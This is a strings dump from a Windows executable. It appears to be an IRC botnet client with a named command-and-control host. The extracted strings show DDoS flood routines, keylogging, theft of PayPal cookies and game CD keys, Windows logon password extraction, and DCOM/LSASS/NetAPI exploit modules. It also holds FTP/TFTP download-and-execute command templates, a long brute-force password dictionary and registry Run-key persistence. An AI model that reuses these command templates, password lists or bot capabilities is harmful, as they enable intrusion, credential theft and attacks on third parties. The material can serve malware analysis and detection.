---------------------------------- 776cbad84cc164b4c38878e8cdee8552/776cbad84cc164b4c38878e8cdee8552_242919a3d2cfbc3cf81501c18b581ad8_unpacked.exe: SPWVjHhHvB YSjHhHvB t1SSSShL t4Ht+HHt!Ht HtCHt9Ht/Ht%Ht SSPhTsC u WPhXrC PSSj(VSSWS YYWhhfC Yt"PhLUC XSVWjD_3 HHtpHHtl SS@SSPVSS VC20XC00U HHtYHHtF GET / HTTP/1.0 Authorization: Negotiate %s __GLOBAL_HEAP_SELECTED __MSVCRT_HEAP_SELECT GAIsProcessorFeaturePresent KERNEL32 runtime error TLOSS error SING error DOMAIN error - unable to initialize heap - not enough space for lowio initialization - not enough space for stdio initialization - pure virtual function call - not enough space for _onexit/atexit table - unable to open console device - unexpected heap error - unexpected multithread lock error - not enough space for thread data abnormal program termination - not enough space for environment - not enough space for arguments - floating point not loaded Microsoft Visual C++ Runtime Library Runtime Error! Program: SunMonTueWedThuFriSat JanFebMarAprMayJunJulAugSepOctNovDec GetLastActivePopup GetActiveWindow MessageBoxA invalid string position string too long Unknown exception Done with flood (%iKB/sec). Send error: <%d>. ddos.random ddos.ack ddos.syn Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB). Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>. Invalid target IP. Error: setsockopt() failed, returned: <%d>. Error: socket() failed, returned: <%d>. [SUPERSYN]: Done with flood (%iKB/sec) Done with flood (%iKB/sec). Send error: <%d>. Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB). Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>. Invalid target IP. Error: setsockopt() failed, returned: <%d>. Error: socket() failed, returned: <%d>. (keylog.p [%d-%d-%d %d:%d:%d] %s %s (Return) (%s) %s (Buffer full) (%s) %s (Changed Windows: %s) now an IRC Operator paypal.com PAYPAL.COM Set-Cookie: Error: recv() failed, returned: <%d> Suspicious %s packet from: %s:%d - %s. Error: WSAIoctl() failed, returned: <%d>. Error: bind() failed, returned: <%d>. Error: socket() failed, returned: <%d>. transfer complete to IP: %s \\%s\pipe\epmapper YZqvgff PC NETWORK PROGRAM 1.0 LANMAN1.0 Windows for Workgroups 3.1a LM1.2X002 LANMAN2.1 NT LM 0.12 NTLMSSP NTLMSSP WinXP Professional [universal] lsass.exe Win2k Professional [universal] netrap.dll Win2k Advanced Server [SP4] netrap.dll echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s tftp -i %s get %s PC NETWORK PROGRAM 1.0 LANMAN1.0 Windows for Workgroups 3.1a LM1.2X002 LANMAN2.1 NT LM 0.12 D CKFDENECFDEFFCFGEFFCCACACACACACA CACACACACACACACACACACACACACACAAA ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s Windows XP (SP0+SP1) Windows NT4, 2000 (SP0-SP4) \\%s\pipe\browser \/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk lllllllllllllllllllllllllllllllllllllAA mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC ffffcsc PMP]iVXQ echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe attempting to root %s 221 Goodbye happy r00ting. 425 Can't open data connection. %s, port:%d now executing %s on remote ABOSAL7. 226 Transfer complete. 150 Opening BINARY mode data connection 200 PORT command successful. 226 Transfer complete 425 Passive not supported on this server 200 Type set to I. 200 Type set to A. 257 "/" is current directory. 350 Restarting. 215 NzmxFtpd 230 User logged in. 331 Password required 220 NzmxFtpd 0wns j0 Error: server failed, returned: <%d>. HTTP/1.0 200 OK Server: myBot Cache-Control: no-cache,no-store,max-age=0 pragma: no-cache Content-Type: %s Content-Length: %i Accept-Ranges: bytes Date: %s %s GMT Last-Modified: %s %s GMT Expires: %s %s GMT Connection: close HTTP/1.0 200 OK Server: myBot Cache-Control: no-cache,no-store,max-age=0 pragma: no-cache Content-Type: %s Accept-Ranges: bytes Date: %s %s GMT Last-Modified: %s %s GMT Expires: %s %s GMT Connection: close ddd, dd MMM yyyy application/octet-stream text/html Failed to start worker thread, error: <%d>. Worker thread of server thread: %d. Found: %i Files and %i Directories
PRIVMSG %s :Found %s Files and %s Directories %-31s %-21s (%i bytes) %s %dk ">%s ">%.30s> PRIVMSG %s :%-31s %-21s (%s bytes) %s - ">%s/ ">%.29s>/ Parent Directory Searching for: %s
Name Last Modified Size

Index of %s

Index of %s PRIVMSG %s :Searching for: %s %s %s HTTP/1.1 Referer: %s Connection: close transfer to %s successfully completed File not found: %s (%s). File Not Found transfer to %s beginning Failed to open file: %s. Error: socket() failed, returned: <%d>. dcom135 Dcom135 dcom445 Dcom445 dcom1025 Dcom1025 lsass_445 lsass_445 lsass_135 lsass_135 lsass_139 lsass_139 asn1smb asn1smbnt napi445 netapi445 napi139 netapi139 symantec YZqbgff Total: %d in %s. (portscan.p Exploit Statistics: (portscan.p Scan not active. (portscan.p Current IP: %s. Failed to start server, error: <%d>. Server listening on IP: %s:%d, Directory: %s\. Failed to start server, error: <%d>. Server started on Port: %d, File: %s, Request: %s. Failed to start server, error: <%d>. Server started on Port: %d, File: %s, Request: %s. (portscan.p IP: %s, Port %d is open. (portscan.p IP: %s:%d, Scan thread: %d, Sub-thread: %d. (portscan.p Finished at %s:%d after %d minute(s) of scanning. (portscan.p Failed to start worker thread, error: <%d>. (portscan.p %s:%d, Scan thread: %d, Sub-thread: %d. (portscan.p Failed to initialize critical section. (redirect.p Failed to start client thread, error: <%d>. (redirect.p Client connection from IP: %s:%d, Server thread: %d. (redirect.p Failed to start connection thread, error: <%d>. (redirect.p Client connection to IP: %s:%d, Server thread: %d. Failed to start server on Port %d. Failed to start client thread, error: <%d>. Client connection from IP: %s:%d, Server thread: %d. Server started on: %s:%d. Error: Failed to connect to target, returned: <%d>. Error: Failed to open socket(), returned: <%d>. Authentication failed. Remote userid: %s != %s. DISPLAY Neverwinter Nights (Hordes of the Underdark) Neverwinter Nights (Shadows of Undrentide) nwncdkey.ini Neverwinter Nights Location Software\BioWare\NWN\Neverwinter mtkwftmkemfew3p3b7 base\mp\sof2key Soldier of Fortune II - Double Helix InstallPath Software\Activision\Soldier of Fortune II - Double Helix Hidden & Dangerous 2 Software\Illusion Softworks\Hidden & Dangerous 2 SerialNumber Software\Techland\Chrome Software\Westwood\NOX Command and Conquer: Red Alert 2 Software\Westwood\Red Alert 2 Command and Conquer: Red Alert Software\Westwood\Red Alert Command and Conquer: Tiberian Sun Software\Westwood\Tiberian Sun Rainbow Six III RavenShield Software\Red Storm Entertainment\RAVENSHIELD Nascar Racing 2003 Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc Nascar Racing 2002 Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc NHL 2003 Software\Electronic Arts\EA Sports\NHL 2003\ergc NHL 2002 Software\Electronic Arts\EA Sports\NHL 2002\ergc FIFA 2003 Software\Electronic Arts\EA Sports\FIFA 2003\ergc FIFA 2002 Software\Electronic Arts\EA Sports\FIFA 2002\ergc Shogun: Total War: Warlord Edition Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edition\ergc Need For Speed: Underground Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc Need For Speed Hot Pursuit 2 Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2 Medal of Honor: Allied Assault: Spearhead Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Spearhead\ergc Medal of Honor: Allied Assault: Breakthrough Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Breakthrough\ergc Medal of Honor: Allied Assault Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\ergc Global Operations Software\Electronic Arts\EA GAMES\Global Operations\ergc Command and Conquer: Generals Software\Electronic Arts\EA GAMES\Generals\ergc James Bond 007: Nightfire Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc Command and Conquer: Generals (Zero Hour) Software\Electronic Arts\EA GAMES\Command and Conquer Generals Zero Hour\ergc Black and White Software\Electronic Arts\EA GAMES\Black and White\ergc Battlefield Vietnam Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc Battlefield 1942 (Secret Weapons of WWII) Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons of WWII\ergc Battlefield 1942 (Road To Rome) Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rome\ergc Battlefield 1942 Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc Freedom Force Software\Electronic Arts\EA Distribution\Freedom Force\ergc IGI 2: Covert Strike Software\IGI 2 Retail Unreal Tournament 2004 Software\Unreal Technology\Installed Apps\UT2004 Unreal Tournament 2003 Software\Unreal Technology\Installed Apps\UT2003 Microsoft Windows Product ID ProductId Software\Microsoft\Windows\CurrentVersion Soldiers Of Anarchy Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings Legends of Might and Magic CustomerNumber Software\3d0\Status Industry Giant 2 Software\JoWooD\InstalledGames\IG2 Half-Life Software\Valve\Half-Life\Settings Gunman Chronicles Software\Valve\Gunman\Settings The Gladiators RegNumber Software\Eugen Systems\The Gladiators Counter-Strike (Retail) Software\Valve\CounterStrike\Settings %s CD Key: (%s). (findfile.p Files found: %d. (findfile.p Searching for file: %s. Found: %s\%s (findpass.p Failed to enable Debug Privilege. (findpass.p Unable to find Winlogon Process ID. (findpass.p Unable to find the password in memory. (findpass.p The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(no password)). RtlRunDecodeUnicodeString RtlDestroyQueryDebugBuffer RtlQueryProcessDebugInformation RtlCreateQueryDebugBuffer NtQuerySystemInformation NTDLL.DLL SeDebugPrivilege (findpass.p Only supported on Windows NT/2000. WINLOGON (findpass.p The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/%S). (findpass.p The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(N/A)). capGetDriverDescriptionA capCreateCaptureWindowA avicap32.dll SQLDisconnect SQLFreeHandle SQLAllocHandle SQLExecDirect SQLSetEnvAttr SQLDriverConnect odbc32.dll SHChangeNotify ShellExecuteA shell32.dll WNetCancelConnection2W WNetCancelConnection2A WNetAddConnection2W WNetAddConnection2A DeleteIpNetEntry GetIpNetTable iphlpapi.dll DnsFlushResolverCacheEntry_A DnsFlushResolverCache dnsapi.dll NetMessageBufferSend NetUserGetInfo NetUserEnum NetUserDel NetUserAdd NetRemoteTOD NetApiBufferFree NetScheduleJobAdd NetShareEnum NetShareDel NetShareAdd netapi32.dll IcmpSendEcho IcmpCloseHandle IcmpCreateFile icmp.dll Mozilla/4.0 (compatible) InternetCloseHandle InternetReadFile InternetCrackUrlA InternetOpenUrlA InternetOpenA InternetConnectA HttpSendRequestA HttpOpenRequestA InternetGetConnectedStateEx InternetGetConnectedState wininet.dll closesocket getpeername gethostbyaddr gethostbyname gethostname getsockname setsockopt recvfrom inet_addr inet_ntoa connect ioctlsocket WSACleanup WSAGetLastError WSAIoctl __WSAFDIsSet WSAAsyncSelect WSASocketA WSAStartup ws2_32.dll DeleteObject DeleteDC SelectObject GetDIBColorTable GetDeviceCaps CreateCompatibleDC CreateDIBSection CreateDCA gdi32.dll GetUserNameA IsValidSecurityDescriptor EnumServicesStatusA CloseServiceHandle DeleteService ControlService StartServiceA OpenServiceA OpenSCManagerA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCloseKey RegDeleteValueA RegQueryValueExA RegSetValueExA RegCreateKeyExA RegOpenKeyExA advapi32.dll GetForegroundWindow GetWindowTextA GetKeyState GetAsyncKeyState ExitWindowsEx CloseClipboard GetClipboardData OpenClipboard DestroyWindow IsWindow FindWindowA SendMessageA user32.dll RegisterServiceProcess QueryPerformanceFrequency QueryPerformanceCounter SearchPathA GetDriveTypeA GetLogicalDriveStringsA GetDiskFreeSpaceExA Module32First Process32Next Process32First CreateToolhelp32Snapshot SetErrorMode kernel32.dll DLL test complete. Avicap32.dll failed. <%d> Odbc32.dll failed. <%d> Shell32.dll failed. <%d> Mpr32.dll failed. <%d> Iphlpapi.dll failed. <%d> Dnsapi.dll failed. <%d> Netapi32.dll failed. <%d> Icmp.dll failed. <%d> Wininet.dll failed. <%d> Ws2_32.dll failed. <%d> Gdi32.dll failed. <%d> Advapi32.dll failed. <%d> User32.dll failed. <%d> Kernel32.dll failed. <%d> %s Error: %s <%d>. explorer.exe SeShutdownPrivilege %%comspec%% /c %s %s @echo off if exist "%%1" goto repeat %sdel.bat (flushdns.p Not supported by this system. (flushdns.p Unable to allocation ARP cache. (flushdns.p ARP cache is empty. (flushdns.p Error getting ARP cache: <%d>. Finished sending pings to %s. Error sending pings to %s. Finished sending packets to %s. Error sending pings to %s. PRIVMSG %s :%s Could not read data from proccess. Proccess has terminated. Could not read data from proccess Failed to start IO thread, error: <%d>. Remote Command Prompt [SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s. dd:MMM:yyyy couldn't resolve host [NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s. Not connected Failed to connect to HTTP server. Could not open a connection. Invalid URL. Failed to get requested URL from HTTP server. URL visited. -[Alias List]- [%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s Cleared. List complete. Failed to send to Remote command shell. Failed to open remote command shell. Failed to open socket. Socket error. Transfer complete to IP: %s, Filename: %s (%s bytes). Unable to open socket. Send timeout. DCC SEND %s %i %i %i File doesn't exist. Failed to bind to socket. Failed to create socket. Transfer complete from IP: %s, Filename: %s (%s bytes). Error opening socket. Error opening file for writing. Error unable to write file to disk. (download.p Bad URL, or DNS Error: %s. (download.p Update failed: Error executing file: %s. (download.p Downloaded %.1fKB to %s @ %.1fKB/sec. Updating. (download.p Opened: %s. (download.p Downloaded %.1f KB to %s @ %.1f KB/sec. (download.p CRC Failed (%d != %d). (download.p Filesize is incorrect: (%d != %d). (download.p Update: %s (%dKB transferred). (download.p File download: %s (%dKB transferred). (download.p Couldn't open file: %s. Unknown Invalid Network %s Drive (%s): %s total, %s free, %s available. %s Drive (%s): Failed to stat, device not ready. PRIVMSG Continued Continue Stopped Started Deleted %s: No service specified. Error with service: '%s'. %s %s service: '%s'. An unknown error occurred: <%ld> The system is shutting down. The service has not been started. The requested control code cannot be sent to the service because the state of the service. The service has been marked for deletion. The service could not be logged on. The account does not have the correct access rights. The specified service does not exist. The service has been disabled. The service depends on another service that has failed to start. The service depends on a service that does not exist or has been marked for deletion. The specified database does not exist. An instance of the service is already running. The requested control code is not valid, or it is unacceptable to the service. The process for the service was started, but it did not call StartServiceCtrlDispatcher. A thread could not be created for the service. The database is locked. The service cannot be stopped because other running services are dependent on it. The service binary file could not be found. The handle does not have the required access right. The handle is invalid. The requested control code is undefined. The specified service name is invalid. Stopped Starting Stoping Running Continuing Pausing Unknown The following Windows services are registered: %s: No share specified. %s share: '%s'. %s: Error with share: '%s'. %s %-14S %-24S %-6u %-4s Share list error: %s <%ld> Share name: Resource: Uses: Desc: %s: No username specified. %s: Error with username: '%s'. %s %s username: '%s'. User info error: <%ld> Units Per Week: %d Max. Storage: %d User's Language: %d Country Code: %d Workstations: %S Logon Server: %S Last Logoff: %d Last Logon: %d Number of Logins: %d Bad Password Count: %d Password Age: %d Parameters: %S Home Directory: %S Auth Flags: %d Privilege Level: %s Administrator Comment: %S User Comment: %S Full Name: %S Account: %S Total users found: %d. An access violation has occured. User list error: %s <%ld> Username accounts for local system: Network connection not found. The user name could not be found. Share not found. The computer name is invalid. An unknown error occurred. The password is shorter than required (or does not meet the password policy requirement.) The group already exists. The user account already exists. The operation is allowed only on the primary domain controller of the domain. A general failure occurred in the network hardware. Level parameter is invalid. Device or directory does not exist. Invalid for redirected resource. Duplicate share name. The name is invalid. Access denied. Not enough memory. This network request is not supported. Server name not found. Invalid parameter. %s Message sent successfully. ABOSAL7 tool saber.ircqforum.com saber.ircqforum.com firstswin.exe cvbei.dll Systam13 firstswin.exe Software\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\RunServices Software\Microsoft\OLE SYSTEM\CurrentControlSet\Control\Lsa zimmerman yellowstone wisconsin williamsburg wholesale topography temptation telephone tangerine supported superuser superstage stuttgart stratford stephanie signature sheffield rochester rachmaninoff professor princeton pondering polynomial persimmon percolate oceanography nutrition macintosh lamination innocuous imbroglio happening foresight foolproof extension establish enterprise elizabeth eiderdown edinburgh discovery desperate cornelius commrades christine christina chemistry catherine campanile bicameral beethoven atmosphere anthropogenic andromache amorphous albatross h4x0ring h4x0r1ng windoze95 windoze98 windozeME windoze2k windozexp windows95 windows98 windowsME windows2k WindowsXP windose windoze windowz wileecoyote donaldduck Alexander dudette RoscoPColtrane 00000000 zimmerma zeitgeis yosemite yolanda yellowst wyoming wormwood wordperf woodwind wolverin wiseass wisconsi winston windows williams william wholesal whitney whiting whatnot whatever western werewolf wednesda webpage watchwor wargames warfare visualba visitor virginia village videogam vertigo veronica vampire valerie utility username usermane unknown universi universe universa uniform unicorn unhappy tuesday trombone trivial trapdoor transfer tortoise topograp tokenrin tiffany thursday theresa thailand terminat terminal temptati telephon teenage tarragon tangerin tabasco sysadmin symmetry swearer suzanne susanne surfing supporte support supervis superuse supersta superson superman suckmydi success subscrib stuttgar streetfi stratfor strangle strange stoneage stephani starwars startup startrek starship squires springer spiderma sparrows spaceshi sossina somebody software socrates smother sliders simulati simpsons simcity signatur shuttle shivers shitpot shirley sheldon sheffiel shannon service serenity sentinel security scorpion schoolsucks scamper saturday samantha running rosemary rosebud romulan rockyhor rocheste rochelle robotics rightwin riffraff resistan republic release regional referenc redhead reddawn rebecca reality raleigh raindrop rainbow rachmani rachelle punisher pumpkin psychopa protozoa protect program profile professo processo proceed private printer princeto prelude precious porsche ponderin polynomi plymouth playboy pinname phoenix pervert persona persimmo perfect percolat pentium penthous pentagra pentagon penname penguin penelope peanuts patriot patricia passphra pakistan painless packard pacific outside outdoors operator opensesa openlock opening olivetti oceanogr obscurit nyquist nutritio nuclear noxious november nintendo nightmar nicotine newyork newsgrou newborn network netscape neptune nepenthe napoleon muppets mountain mortgage mortalco mission minimum midieval microsof micropro microchi michelle michele michelan michael metalica metalhea mercury melrose melissa megadeth megabyte maurice marriage marines marijuan marietta mariens manager malcolm macintos machine lovebug lorraine loginwor lockword lockout literatu limited limbaugh lightsab library liberal lexluthe letmein lesbian leftwing lebesgue lazarus laminati kristine kristin kristie kristen knightma klingon kissmyas kirkland kimberly killthem keyword keybord katrina kathrine kathleen jupiter journal johndoe jewelry jessica jerusale jennifer irishman integer innocuou ingress indians indiana include imperial immortal imbrogli illumina icecream hypertxt hydrogen hutchins horrible hooters homework homepage hollywoo highland hibernia hiawatha hexadeci hewlett herbert heinlein hebrides heather heathen headbang harmony harddriv hardcore happenin handjob handily hamster hallowee gumption guardian gryphon govermen gosling gorgeous glacier gigabyte gertrude gatherin gateway garfield gardner gabriel fungible function fuckyou fucking frighten friends freedom foxtrot fourier forsythe fornicat forever foresigh football foolproo flowers florida fishers firewall fidelity ferrari felicia faraday fairway extensio explosiv explorer explore explode eternity establis erenity enterpri english england engineer emmanuel emerald elizabet elephant electron einstein einsiein eiderdow egghead educatio education edition edinburg dungeon duelist drought download doonesbu doomsday display diskette discover disclose discipli director dipshit dinosaur digital diehard diamond develop desperat desktop desiree democrat DEFAULT december deborah deathsta darkaven danielle cynthia cyberspa cyberpun customer crystal cristina criminal creosote creature creation crackpot couscous country counters correct corneliu cookbook continue console conserva comrades comrade computin company commrade collins codeword codename cocainco cocacola clusters cluster clinton cleavage claymore claudia classic classes cigarett christy christin chester chemistr charming charlie charles charity cerulean celtics catholic catherin cascades caroline carolina cardinal capture captain camping campanil camille californ butthead burgess bumbling bullshit brutefor brunette brothel broadway bridget bradley boyscout blowjob bloodaxe blondie bigfoot bicamera beverly berliner berkeley beowulf beloved beethove beammeup bassoon baseball bartman baritone barbara bananas backdoor bacchus authoriz atmosphe asshole ariadne apollo13 anything anthropo anthrax anonymou annette animals angerine andromac android anarchy anarchis amorphou america amadeus alphabet allison aliases algebra alexande albatros airplane aerobics adrianna account academic academia testing xxxxxxxxx xxxxxxxx xxxxxxx guessme youwontguessme uwontguessme scriptkiddie spaceman satanic satanik Matthew mypass123 admin123 mypc123 test123 netfuck net-devil netdevil patrick 1234qwer godblessyou ihavenopass Internet 88888888 11111111 123456789 12345678 1234567 temp123 Changeme changeme PASSWORD ADMINISTRATOR database default wwwadmin teacher student computer administrat administrateur administrador administrator h4cker tool *@admin.com Bot started. Connected to %s. USER %s 0 0 :%s USERHOST %s User: %s logged in. ABOSAL7 accepted. *Failed host auth by: (%s!%s). *Failed pass auth by: (%s!%s). NOTICE %s :You've been logged. NOTICE %s :Nice try, idiot. (%s!%s). Random nick change: %s Invalid login slot number: %d. No user logged in at slot: %d. (secure.p Failed to start secure thread, error: <%d>. (secure.p %s system. Unsecuring Securing Failed to start server thread, error: <%d>. Find file Process list Reconnecting. QUIT :reconnecting Disconnecting. QUIT :disconnecting Status: Ready. Bot Uptime: %s. (threads.p Failed to start list thread, error: <%d>. (threads.p List threads. Alias list. Failed to start listing thread, error: <%d>. Listing log. Network Info. System Info. Removing Bot. (processes.p Failed to start listing thread, error: <%d>. (processes.p Proccess list. (processes.p Already running. (cdkeys.p Search completed. Uptime: %s. Remote shell ready. Couldn't open remote shell. Remote shell already running. Get Clipboard. -[Clipboard Data]- (flushdns.p Failed to flush ARP cache. (flushdns.p ARP cache flushed. (flushdns.p Failed to load dnsapi.dll. (flushdns.p Failed to flush DNS cache. (flushdns.p DNS cache flushed. (rlogind.p Failed to start server thread, error: <%d>. (rlogind.p Server listening on IP: %s:%d, Username: %s. Failed to start server thread, error: <%d>. Failed to start server thread, error: <%d>. Already running. (findpass.p Failed to start search thread, error: <%d>. (findpass.p Searching for password. Failed to start scan, port is invalid. %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads. Nick changed to: '%s'. Joined channel: '%s'. Parted channel: '%s'. IRC Raw: %s. (threads.p Failed to kill thread: %s. (threads.p Killed thread: %s. (threads.p No active threads found. (threads.p Stopped: %d thread(s). QUIT :later Prefix changed to: '%c'. 15,14nzm 15(shell 15 Couldn't open file: %s 15,14nzm 15(shell 15 File opened: %s Server changed to: '%s'. 